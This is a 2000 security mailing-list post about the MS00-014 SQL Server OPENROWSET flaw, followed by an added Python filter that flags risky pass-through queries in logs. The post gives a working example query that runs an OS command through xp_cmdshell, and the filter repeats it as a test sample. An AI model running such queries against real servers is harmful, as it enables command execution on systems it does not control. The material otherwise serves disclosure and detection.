Subject: SQL Server Vulnerability details
From: Chip Andrews (chipandrews USA.NET)
Date: Sat Mar 18 2000 - 16:40:48 CST
Due to the apparent blackout of information about the "SQL Query Abuse"
advisory http://www.microsoft.com/technet/security/bulletin/ms00-014.asp I
wanted to point any interested parties to an English description of the
vulnerability by Sven Hammesfahr. The detailed description is on his
website at
http://itrain.de/sql/knowhow/security/openrowsete.htm
Also, the "little trick" he refers to is in my opinion the addition of SET
FMTONLY OFF before the execute statement to keep the query from returning
metadata only. An example exploit would be:
SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver','SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')
Test your servers ASAP to keep from becoming a statistic...
-----------------------------------------
Chip Andrews, MCSE+I, MCSD
http://www.sqlsecurity.com
http://www.eexams.com
------------------------------------------
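
Added example, not part of the original post: a Python filter for logged T-SQL statements that flags OPENROWSET/OPENQUERY calls whose pass-through query carries SET FMTONLY OFF, EXEC or xp_cmdshell, as in the statement quoted above. The function names, the linked-server name LNK and every sample statement other than the one from the post are constructed for illustration.

```python
import re

# Rowset functions that hand a pass-through query to an OLE DB provider.
ROWSET_CALL = re.compile(r"\b(OPENROWSET|OPENQUERY)\s*\(", re.I)
RISKY = {
    "fmtonly_off": re.compile(r"\bSET\s+FMTONLY\s+OFF\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "exec": re.compile(r"\bEXEC(UTE)?\b", re.I),
}

def call_literals(sql, pos):
    """Single-quoted literals of the call opened just before pos ('' = escaped quote)."""
    out, depth, i = [], 1, pos
    while i < len(sql) and depth:
        ch = sql[i]
        if ch == "'":
            buf, i = [], i + 1
            while i < len(sql):
                if sql[i] == "'":
                    if sql[i + 1:i + 2] != "'":
                        break              # closing quote
                    i += 1                 # skip first half of ''
                buf.append(sql[i])
                i += 1
            out.append("".join(buf))
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        i += 1
    return out

def findings(sql):
    """Sorted (function, reason) pairs for one logged statement."""
    hits = set()
    for m in ROWSET_CALL.finditer(sql):
        lits = call_literals(sql, m.end())
        query = lits[-1] if lits else ""   # the query is the last literal
        hits.update((m.group(1).upper(), name)
                    for name, rx in RISKY.items() if rx.search(query))
    return sorted(hits)

# Statement from the post, then constructed samples.
PAGE_QUERY = r"""SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver','SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"')"""
BENIGN = "SELECT a.* FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=reports','SELECT au_lname FROM pubs..authors') AS a"
QUOTED = "SELECT * FROM OPENQUERY(LNK, 'exec sp_who ''sa''')"

for stmt in (PAGE_QUERY, BENIGN, QUOTED):
    print(findings(stmt), "<-", stmt[:48])
```

This is string matching on the logged text, so it serves as a triage filter for trace or audit output rather than a T-SQL parser.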